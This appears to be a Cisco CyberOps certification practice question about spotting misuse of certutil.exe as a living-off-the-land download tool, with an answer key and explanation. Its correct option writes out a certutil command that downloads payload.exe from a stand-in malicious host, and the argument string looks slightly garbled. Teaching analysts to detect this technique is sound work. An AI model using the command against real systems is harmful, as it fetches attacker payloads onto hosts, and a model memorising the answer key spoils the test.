Cisco CyberOps Associate (CBROPS) 200-201Host-Based AnalysisHard

A security analyst is investigating a potential compromise on a Windows server where an attacker is suspected of using a 'living off the land' (LotL) technique. Specifically, the attacker is believed to have used `certutil.exe` to download a malicious payload. Which command-line argument, when used with `certutil.exe`, is indicative of its misuse for file download purposes?

  1. A`certutil -dump`
  2. B`certutil -viewstore My`
  3. C`certutil -hashfile C:\malware.exe MD5`
  4. D`certutil -urlcache -f -split -repcache http://malicious.com/payload.exe C:\payload.exe`
Show answer & explanation

Correct answer: D. `certutil -urlcache -f -split -repcache http://malicious.com/payload.exe C:\payload.exe`

The `certutil -urlcache -f -split -repcache` command is a well-known method used by attackers to leverage the legitimate `certutil.exe` utility for downloading files from a specified URL. This sequence of arguments instructs `certutil` to retrieve a file from a URL, force overwrite, split if necessary, and refresh the cache, effectively functioning as a download tool.

Why the other options are wrong

  • A. `certutil -dump` is used to dump certificate information, a legitimate function, not for downloading.
  • B. `certutil -viewstore` is used to view certificate stores, a legitimate function, not for downloading.
  • C. `certutil -hashfile` is used to calculate file hashes, a legitimate function, not for downloading.

Certutil.exe Misuse

The malicious use of the legitimate Windows `certutil.exe` utility, typically for downloading files from the internet or encoding/decoding data, as a 'living off the land' technique.

  • Bypasses traditional security controls.
  • Used for file download, base64 encoding/decoding.
  • Relies on specific command-line arguments.

Memory trick: Attackers use Windows' own 'utilities' like 'Certutil', 'PowerShell', or 'WMIC' to do their dirty work.

More Host-Based Analysis questions